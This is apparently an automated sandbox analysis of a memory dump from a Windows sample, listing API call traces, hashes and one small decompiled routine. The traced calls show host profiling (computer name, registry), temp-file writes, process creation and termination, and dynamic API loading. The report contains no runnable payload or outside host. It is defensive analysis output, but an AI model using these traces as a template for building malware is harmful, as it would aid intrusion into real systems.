                              • Instruction Fuzzy Hash: 24416BF4900204AFDB209FA8CDC8EAEBBFDFF8571172405A9F982D2104D735A940CB60

                              APIs
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0103E8AA
                                • Part of subcall function 0103BF04: lstrlenW.KERNEL32(00000000,747DF560,00000000,?,00000000,?,?,0102EFEF,00000020), ref: 0103BF30
                                • Part of subcall function 0103BF04: RtlAllocateHeap.NTDLL(00000000,?), ref: 0103BF42
                                • Part of subcall function 0103BF04: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF5F
                                • Part of subcall function 0103BF04: lstrlenW.KERNEL32(00000000,?,?,0102EFEF,00000020), ref: 0103BF6B
                                • Part of subcall function 0103BF04: HeapFree.KERNEL32(00000000,00000000,?,?,0102EFEF,00000020), ref: 0103BF7F
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 0103E8E2
                              • CloseHandle.KERNEL32(?), ref: 0103E8F0
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00001000,00000000,00000000,00001000), ref: 0103E9C2
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0103E9D1
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001000,00000000,00000000,00001000), ref: 0103E9E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                              • API String ID: 1719504581-0
                              • Opcode ID: ca98692f22276f1ddb9350c38f6a338590b0ffdcd5fadb888afdf3715d8cba44
                              • Instruction ID: 40d63f818695f4938987d33cf38f5d027f9e22d35445d147e95dae97324063a4
                              • Opcode Fuzzy Hash: ca98692f22276f1ddb9350c38f6a338590b0ffdcd5fadb888afdf3715d8cba44
                              • Instruction Fuzzy Hash: 3C41937160030AEBEBA1DF98D884A9E7BBDBFC4700F000166FAC5A7154DB76D944CB90

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • Opcode ID: b883b64e7bdabe5f7f33f1deaf8f312d5c13957edcf7fbeeb2a543629776c70f
                              • Instruction ID: 91b3121fc62d253c064a41f6122d5218c706a5cc6bb66db118572b7b62ccdc11
                              • Opcode Fuzzy Hash: b883b64e7bdabe5f7f33f1deaf8f312d5c13957edcf7fbeeb2a543629776c70f
                              • Instruction Fuzzy Hash: C941D5B1640722EFD7709F69CC8891BBBE8FB44360B504A2DF2EAC6580D775A804CB61

                              APIs
                                • Part of subcall function 010334A4: lstrlen.KERNEL32(0102EFEF,747DF560,00000000,?,00000000,0103BF21,?,00000000,?,?,0102EFEF,00000020), ref: 010334B3
                                • Part of subcall function 010334A4: mbstowcs.NTDLL ref: 010334CF
                              • lstrlenW.KERNEL32(00000000,?), ref: 010217D2
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                              • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 010217F3
                              • lstrlenW.KERNEL32(?), ref: 0102181D
                                • Part of subcall function 0103F63F: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0103F795
                                • Part of subcall function 0103F63F: RtlEnterCriticalSection.NTDLL(?), ref: 0103F7CA
                                • Part of subcall function 0103F63F: RtlLeaveCriticalSection.NTDLL(?), ref: 0103F7E6
                                • Part of subcall function 0103F63F: FindNextFileW.KERNEL32(?,00000000), ref: 0103F7FF
                                • Part of subcall function 0103F63F: WaitForSingleObject.KERNEL32(00000000), ref: 0103F811
                                • Part of subcall function 0103F63F: FindClose.KERNEL32(?), ref: 0103F826
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F83A
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F85C
                              • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0102183A
                              • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 01021851
                              • PathFindFileNameW.SHLWAPI(0000001E), ref: 01021866
                                • Part of subcall function 0102C627: lstrlenW.KERNEL32(?,?,00000002,00000000,?,?,?,0102187D,?,0000001E,?), ref: 0102C63C
                                • Part of subcall function 0102C627: lstrlenW.KERNEL32(?,?,?,?,0102187D,?,0000001E,?), ref: 0102C644
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                              • API String ID: 2670873185-0
                              • Opcode ID: 4f5592418d766dbffdda90c042d57b0cb7e30a36da181dfce1734c83524677d9
                              • Instruction ID: 152ef44de1ed054476c14eb1150f98ff5c7067d75abe016fd5d4d2f95bdd82a5
                              • Opcode Fuzzy Hash: 4f5592418d766dbffdda90c042d57b0cb7e30a36da181dfce1734c83524677d9
                              • Instruction Fuzzy Hash: FC316FB6404216AFC721AF68C9C486FBBEDFF88254F00096AF5D4D3221E776D9058B52

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 010448F5
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01030027), ref: 0104492B
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 01044939
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01044950
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 01044961
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,01030027), ref: 01044987
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateComputerFreeName
                              • API String ID: 3439771632-0
                              • Opcode ID: d167a95b2460998fa6ea5f88530986dd5d0e0189a619e3531b3f499037ac90cd
                              • Instruction ID: 109a80f7e147d58ac3ca22d8e5cac1305afa223698c621cde6a3799222b4d276
                              • Opcode Fuzzy Hash: d167a95b2460998fa6ea5f88530986dd5d0e0189a619e3531b3f499037ac90cd
                              • Instruction Fuzzy Hash: F931ECBAA00209EFDB50DFA9DDC49AEBBFAFB48304B144469F985D3214D7359E44DB20

                              APIs
                              • lstrlen.KERNEL32(?), ref: 0102736D
                              • lstrlen.KERNEL32(?), ref: 01027383
                              • lstrlen.KERNEL32(?), ref: 01027398
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 010273FD
                              • _snprintf.NTDLL ref: 01027423
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001), ref: 01027441
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heap$AllocateFree_snprintf
                              • API String ID: 3180502281-0
                              • Opcode ID: 80dac5697c53d5f11094c3e3bb1879cf5f7086a7ff77f1a46947d7c4bbe8480d
                              • Instruction ID: aad79c72897e031a3e528ea076ccdea23eb349f066a90dd403d3470c057b4ae6
                              • Opcode Fuzzy Hash: 80dac5697c53d5f11094c3e3bb1879cf5f7086a7ff77f1a46947d7c4bbe8480d
                              • Instruction Fuzzy Hash: 6331BC76900229FFDF21DFA9CC808AF7BAAFB44340B008829FD85A7114D7769D10DBA0

                              APIs
                              • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                              • CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                              • GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 010432FF: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                                • Part of subcall function 010432FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                                • Part of subcall function 010432FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                                • Part of subcall function 010432FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              • GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                              • SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                              • HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                              • API String ID: 1835239314-0
                              • Opcode ID: 26b621dcf1d78a7f35b0cf2e7185a8ab4d7e2a6835085c5f4e70779e481813fa
                              • Instruction ID: a7181646b5c658f99b2dd5d81c1bf4e9a218d2f6a4257fa99bf91e24b6c015a3
                              • Opcode Fuzzy Hash: 26b621dcf1d78a7f35b0cf2e7185a8ab4d7e2a6835085c5f4e70779e481813fa
                              • Instruction Fuzzy Hash: 063149B5A00209EBCB21DF9AC989CAFBFBDFBC4344B948056F586E7145D3359A40CB60

                              APIs
                              • StrChrA.SHLWAPI(?,00000020), ref: 01024922
                              • StrChrA.SHLWAPI(00000001,00000020), ref: 01024933
                                • Part of subcall function 01034527: lstrlen.KERNEL32(?,?,00000000,00000000,?,0103A640,00000000,?,?,00000000,00000001), ref: 01034539
                                • Part of subcall function 01034527: StrChrA.SHLWAPI(00000001,0000000D,?,0103A640,00000000,?,?,00000000,00000001), ref: 01034571
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 01024973
                              • memcpy.NTDLL(00000000,?,00000007), ref: 010249A0
                              • memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 010249AF
                              • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 010249C1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • API String ID: 1819133394-0
                              • Opcode ID: c98dcf9b4b5ad1ea3f45bcae5641405d4c116d8c8500695b7806a30f76fd5cb6
                              • Instruction ID: 5c6c888eaffc90bc8df1af8febc8ffe516d92fe3908ce9ca900af5639056a4d7
                              • Opcode Fuzzy Hash: c98dcf9b4b5ad1ea3f45bcae5641405d4c116d8c8500695b7806a30f76fd5cb6
                              • Instruction Fuzzy Hash: 2F215E76A00219BFDB21DF98CC84F9ABBECEF08744F054162F984DB155E675EA448BA0

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 010255F2
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01025603
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 0102561E
                              • GetLastError.KERNEL32(?,?,?,?), ref: 01025634
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 01025646
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 0102565B
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                              • API String ID: 1822509305-0
                              • Opcode ID: cfd7b1936e6d4dec70c2263dbd77432d60dc9c7d172507dc41cfb4675ac3dc53
                              • Instruction ID: 395b8697741f7e90d538b09a1dfbe7e353658d3d801da9b73ac86af6bed83818
                              • Opcode Fuzzy Hash: cfd7b1936e6d4dec70c2263dbd77432d60dc9c7d172507dc41cfb4675ac3dc53
                              • Instruction Fuzzy Hash: BB117C7A901128FBCB325B95DD48CEF7FBEEF49390F004061F685A2024C6368A51EBA4

                              APIs
                              • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 01025CED
                              • _strupr.NTDLL ref: 01025D28
                              • lstrlen.KERNEL32(00000000), ref: 01025D30
                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 01025D6F
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 01025D76
                              • GetLastError.KERNEL32 ref: 01025D7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                              • API String ID: 110452925-0
                              • Opcode ID: 82167195a43e468897eaf0b9d78856cac17f61aa7be3f414c275387fb6a99bbb
                              • Instruction ID: d1d04c98adabef6e9a5130ca9687aa683854736a413b8de17fa0a0a33281d56d
                              • Opcode Fuzzy Hash: 82167195a43e468897eaf0b9d78856cac17f61aa7be3f414c275387fb6a99bbb
                              • Instruction Fuzzy Hash: 4311B2B9600225FFEB316B749D8C9EF77ADEB88750B100415FA87D6048EA7A9845CB20

                              APIs
                              • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0103FC03,?,00000000,?,00002334), ref: 0102DC05
                              • lstrlen.KERNEL32(?,?,?,?,?,?,0103FC03,?,00000000,?,00002334,?,?,?,?,01029FC0), ref: 0102DC0C
                              • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0102DC1E
                              • _snprintf.NTDLL ref: 0102DC44
                                • Part of subcall function 0104339E: memset.NTDLL ref: 010433B3
                                • Part of subcall function 0104339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                                • Part of subcall function 0104339E: wcstombs.NTDLL ref: 010433F6
                                • Part of subcall function 0104339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                                • Part of subcall function 0104339E: TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B0
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B5
                              • _snprintf.NTDLL ref: 0102DC78
                                • Part of subcall function 0104339E: GetLastError.KERNEL32 ref: 01043481
                                • Part of subcall function 0104339E: GetExitCodeProcess.KERNEL32(?,00000001), ref: 010434A1
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0102DC95
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                              • API String ID: 1481739438-0
                              • Opcode ID: 3a17084b3362cd26a170378a2c18042d71ee9cd26b02286457de51bddafce7d8
                              • Instruction ID: 69822bcc9d96c26a64595977b6d1b95632be8bf1f8a25dcc76a14521aa4dce62
                              • Opcode Fuzzy Hash: 3a17084b3362cd26a170378a2c18042d71ee9cd26b02286457de51bddafce7d8
                              • Instruction Fuzzy Hash: 3E11B1B6500219FFCB219F54DD88EDF3F6DEB08360B154121F98997215C676E910DBA0

                              APIs
                              • lstrlen.KERNEL32(?,00000000,00000000,00000008,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 010320ED
                              • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 01032100
                              • lstrcpy.KERNEL32(00000008,?), ref: 01032122
                              • GetLastError.KERNEL32(0103E845,00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 0103214B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 01032163
                              • CloseHandle.KERNEL32(00000000,0103E845,00000000,00000000,?,?,010274A5,010471E6,00000000,?,?,?,?,01024216,?,?), ref: 0103216C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                              • API String ID: 2860611006-0
                              • Opcode ID: 0c1cab077fefd9134b40f47cf6b426e7d9fbc871023541c4f04000d087bc5004
                              • Instruction ID: 2147fdec7b9c7e291145d186ce30abc52bcc9dd4a76fff07e56a50f88290f804
                              • Opcode Fuzzy Hash: 0c1cab077fefd9134b40f47cf6b426e7d9fbc871023541c4f04000d087bc5004
                              • Instruction Fuzzy Hash: BE118179600305EFDB619F68DD8889FBBBCFB943607004569F696C3110DB359D05CB60

                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,0103C64E,00000000,00000001), ref: 0103EF4D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF6C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF81
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EF97
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EFAD
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0103EFC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AddressProc$AllocateHeapLibraryLoad
                              • API String ID: 2486251641-0
                              • Opcode ID: ef6f86a7bbfcbc34147b5da911c63bedf13d52db8eb4c7aada0327ac690e8561
                              • Instruction ID: b34c2e5a9a141674a141747c1c2a35e15ed4beb79ec025cc07536e037c5ae165
                              • Opcode Fuzzy Hash: ef6f86a7bbfcbc34147b5da911c63bedf13d52db8eb4c7aada0327ac690e8561
                              • Instruction Fuzzy Hash: AD11DAB220020F9FE760DB69D884D977BECEB447807151975B695C7109EB75D805CB60

                              APIs
                              • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74785520,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D62B
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D644
                              • GetCurrentThreadId.KERNEL32 ref: 0103D651
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01042F93,00000000,?,00000000,010243B5,?,?,?,?,?,010243B5,00000000), ref: 0103D65D
                              • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01042F93,00000000,?,00000000,010243B5), ref: 0103D66B
                              • lstrcpy.KERNEL32(00000000), ref: 0103D68D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                              • API String ID: 1175089793-0
                              • Opcode ID: 8949986024ce07f3bd7b7097a506eb459f8d672c8d15c7fcec38ff7e4eadb040
                              • Instruction ID: 14a9177a24a40ffd92846df8257ae923c38702ec2763dd8018d522cd60e1f529
                              • Opcode Fuzzy Hash: 8949986024ce07f3bd7b7097a506eb459f8d672c8d15c7fcec38ff7e4eadb040
                              • Instruction Fuzzy Hash: 5C01C876600115A7E7205BE99DD8EAB3FBCEBC57407050065BA99D3105DB79D8009B70

                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset
                              • String ID: vids
                              • API String ID: 3276359510-3767230166
                              • Opcode ID: 6e7609b1a8b6077261975ac0e7dc84fb8a82b64256ad678f99b5c5dcb73b1033
                              • Instruction ID: 17a33c4685484564c37cee100ba61eaa62cc59c1ef6530fbe3d4d9b3ce7319c3
                              • Opcode Fuzzy Hash: 6e7609b1a8b6077261975ac0e7dc84fb8a82b64256ad678f99b5c5dcb73b1033
                              • Instruction Fuzzy Hash: 158106B1D0022ADFCF11DFA8D9809EDBBB9BF48714F10816AF459AB250D7759A41CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102DD78
                              • lstrlen.KERNEL32(?,?), ref: 0102DDA9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 0102DDB8
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0102DE37
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              • Opcode ID: fa1eff425532a7d88d10512cdf8dc9bec00ea52e8b25a94add698a8fe662e46c
                              • Instruction ID: 4e9b0f6146ee921e27ee9484a5f01ca8ceb9d39617df85daf14b7380178b9f4c
                              • Opcode Fuzzy Hash: fa1eff425532a7d88d10512cdf8dc9bec00ea52e8b25a94add698a8fe662e46c
                              • Instruction Fuzzy Hash: B141E170500A1AEBDB75AF9CD8847EA7BFAAF54340F40846AE9C98B214C3349885CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0104472A
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 01044791
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 0104479B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              • Opcode ID: ca3d86f610ca0cbebdcf2ab9d67667e9d3f288039a241b49d52a01e8b3af7770
                              • Instruction ID: c47cb90d3eb39c3a64fad32ed7ce65ba07f6a85ad5e087ea49ef9085d280dace
                              • Opcode Fuzzy Hash: ca3d86f610ca0cbebdcf2ab9d67667e9d3f288039a241b49d52a01e8b3af7770
                              • Instruction Fuzzy Hash: DF4178B0A00B459FDB61CFA8C9847AEBBF5FF19204F56496DD5C6D3680E338A905CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,010412DD,00000000,?,?,?,010412DD,?,?,?,?,?), ref: 010214B5
                              • lstrlen.KERNEL32(010412DD,?,?,?,010412DD,?,?,?,?,?), ref: 010214D3
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 01021542
                              • lstrlen.KERNEL32(010412DD,00000000,00000000,?,?,?,010412DD,?,?,?,?,?), ref: 01021563
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 01021577
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 01021580
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0102158E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              • Opcode ID: ffcc62ac9e6794f2b1d91ee7d1f09104cb64f4d420ac5340ef11baefdc3fc94a
                              • Instruction ID: 590881016ee02a22763e057c126ba2d7684d452c112771744c3bdf0c65ca41ef
                              • Opcode Fuzzy Hash: ffcc62ac9e6794f2b1d91ee7d1f09104cb64f4d420ac5340ef11baefdc3fc94a
                              • Instruction Fuzzy Hash: 664107B680022AEBDF109F68DD818DF3FA8EF142A4B044466FD59A7110E731DA208BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E013E4D70() {
                              				void* _v0;
                              				void** _t3;
                              				void** _t5;
                              				void** _t7;
                              				void** _t8;
                              				void* _t10;
                              
                              				_t3 =  *0x13ed35c; // 0x3ad95b0
                              				__imp__( &(_t3[0x10]));
                              				while(1) {
                              					_t5 =  *0x13ed35c; // 0x3ad95b0
                              					_t1 =  &(_t5[0x16]); // 0x0
                              					if( *_t1 == 0) {
                              						break;
                              					}
                              					Sleep(0xa);
                              				}
                              				_t7 =  *0x13ed35c; // 0x3ad95b0
                              				_t10 =  *_t7;
                              				if(_t10 != 0 && _t10 != 0x13ee823) {
                              					HeapFree( *0x13ed270, 0, _t10);
                              					_t7 =  *0x13ed35c; // 0x3ad95b0
                              				}
                              				 *_t7 = _v0;
                              				_t8 =  &(_t7[0x10]);
                              				__imp__(_t8);
                              				return _t8;
                              			}
                              0x013e4d70
                              0x013e4d79
                              0x013e4d89
                              0x013e4d89
                              0x013e4d8e
                              0x013e4d93
                              0x00000000
                              0x00000000
                              0x013e4d83
                              0x013e4d83
                              0x013e4d95
                              0x013e4d9a
                              0x013e4d9e
                              0x013e4db1
                              0x013e4db7
                              0x013e4db7
                              0x013e4dc0
                              0x013e4dc2
                              0x013e4dc6
                              0x013e4dcc

                              APIs
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E4D79
                              • Sleep.KERNEL32(0000000A), ref: 013E4D83
                              • HeapFree.KERNEL32(00000000), ref: 013E4DB1
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E4DC6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 040e656a037784c630000671ec035db4e3137e0cb8ee7e43eadedc86910c3e2f
                              • Instruction ID: 7a847a0a742dd3c076aef7f778006637ccced60e9f47a4682b38db890cd017ed
                              • Opcode Fuzzy Hash: 040e656a037784c630000671ec035db4e3137e0cb8ee7e43eadedc86910c3e2f
                              • Instruction Fuzzy Hash: F5F0DA782003409BEB399BA4D849B6A7BFCBB09708F088019E902CF3D5C631EC04CB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(761506E0,00000000,00000000,761506E0,00000020,80000001,01022289,?,761506E0), ref: 0102DE61
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0102DE7E
                              • lstrlenW.KERNEL32(?,00000000,00000020,80000001,?,761506E0), ref: 010222B6
                              • lstrlenW.KERNEL32(00000008), ref: 010222BD
                              • lstrlenW.KERNEL32(?,?), ref: 010222DB
                              • lstrlen.KERNEL32(00000000,?,00000000), ref: 01022399
                              • lstrlenW.KERNEL32(?), ref: 010223A4
                              • wsprintfA.USER32 ref: 010223E6
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
